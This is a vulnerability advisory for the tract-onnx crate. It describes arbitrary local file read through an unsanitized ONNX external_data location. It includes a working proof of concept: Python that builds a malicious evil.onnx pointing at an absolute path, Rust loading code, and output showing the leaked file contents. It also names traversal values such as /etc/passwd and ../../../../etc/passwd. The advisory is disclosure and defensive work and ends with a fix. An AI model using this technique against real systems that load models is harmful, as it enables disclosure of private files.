tract: Arbitrary file read via unsanitized ONNX external_data location (path traversal) on model load in tract-onnx
Summary
tract (the tract-onnx crate) resolves an ONNX tensor's external-data location by joining it onto the model directory without any sanitization. Because location comes from the (untrusted) .onnx file, a malicious model can make tract open and read an arbitrary local file at load time, with the file's contents flowing into the model's tensors / inference output (read-only file disclosure). This is the ONNX external-data path-traversal class that the reference onnx library hardened over several CVEs; tract resolves location itself and was never hardened.
Details
In onnx/src/tensor.rs, get_external_resources() builds the path with no checks:
let location = /* tensor.external_data "location" value — attacker-controlled */;
let p = PathBuf::from(path).join(location); // no is_absolute / ".." / canonicalize / containment check
provider.read_bytes_from_path(&mut tensor_data, &p, offset, length)?; // Mmap::map(File::open(p)) by default
Path::joinwith an absolutelocation(e.g./etc/passwd) discards the base directory →p = /etc/passwd.- A relative
../../../../etc/passwdvalue is not normalized → directory traversal. - The default
MmapDataResolver(onnx/src/data_resolver.rs) thenmmaps the file and copiesmmap[offset..offset+length]into the tensor.offset/lengthare also taken from the file; an out-of-range slice panics (DoS).
No is_absolute, .., canonicalize, or containment check exists anywhere on this path (tensor.rs, model.rs, data_resolver.rs).
Reachable from the standard public API: model_for_path(p) (onnx/src/model.rs) sets model_dir = p.parent() and calls load_tensor(proto, model_dir) → get_external_resources(.., model_dir).
PoC
Tested on tract-onnx 0.21.16 (crates.io), Rust 1.96.
- A canary file the model must not be able to read:
/tmp/tract_canary_secret.txt → TRACT-EXTDATA-TRAVERSAL-CANARY-7f3a2b
- Build a small
evil.onnxwith aUINT8[37]initializer whoseexternal_dataislocation=/tmp/tract_canary_secret.txt(absolute),offset=0,length=37, fed throughIdentityto the output (raw protobuf serialization):
import onnx
from onnx import helper, TensorProto, StringStringEntryProto
N = 37; LOC = "/tmp/tract_canary_secret.txt" # absolute -> Path::join discards the base dir
w = TensorProto(); w.name = "W"; w.data_type = TensorProto.UINT8
w.dims.extend([N]); w.data_location = TensorProto.EXTERNAL
for k, v in [("location", LOC), ("offset", "0"), ("length", str(N))]:
e = StringStringEntryProto(); e.key = k; e.value = v; w.external_data.append(e)
node = helper.make_node("Identity", ["W"], ["Y"])
out = helper.make_tensor_value_info("Y", TensorProto.UINT8, [N])
g = helper.make_graph([node], "g", [], [out], initializer=[w])
m = helper.make_model(g, opset_imports=[helper.make_opsetid("", 13)])
open("evil.onnx", "wb").write(m.SerializeToString())
- Victim loads the untrusted model with the standard API:
let model = tract_onnx::onnx().model_for_path("evil.onnx")?;
let out = model.into_optimized()?.into_runnable()?.run(tvec!())?;
let bytes: Vec = out[0].to_array_view::()?.iter().cloned().collect();
println!("{:?}", String::from_utf8_lossy(&bytes));Output:
"TRACT-EXTDATA-TRAVERSAL-CANARY-7f3a2b"i.e. the contents of the arbitrary local file were read by tract and surfaced in the inference output.
Impact
Read-only arbitrary local file disclosure when an application uses tract to load an untrusted or shared ONNX model (model hubs, multi-file repos, user uploads). The file content is recoverable from the model's tensors / inference output. Secondary: denial of service (panic) via out-of-bounds offset/length. No write or code execution.
Suggested fix
Reject absolute location and any .. component, then canonicalize and verify the resolved path stays within the model directory (mirroring onnx 1.22.0's resolve_external_data_location); reject symlinks; validate offset/length against the file size before slicing.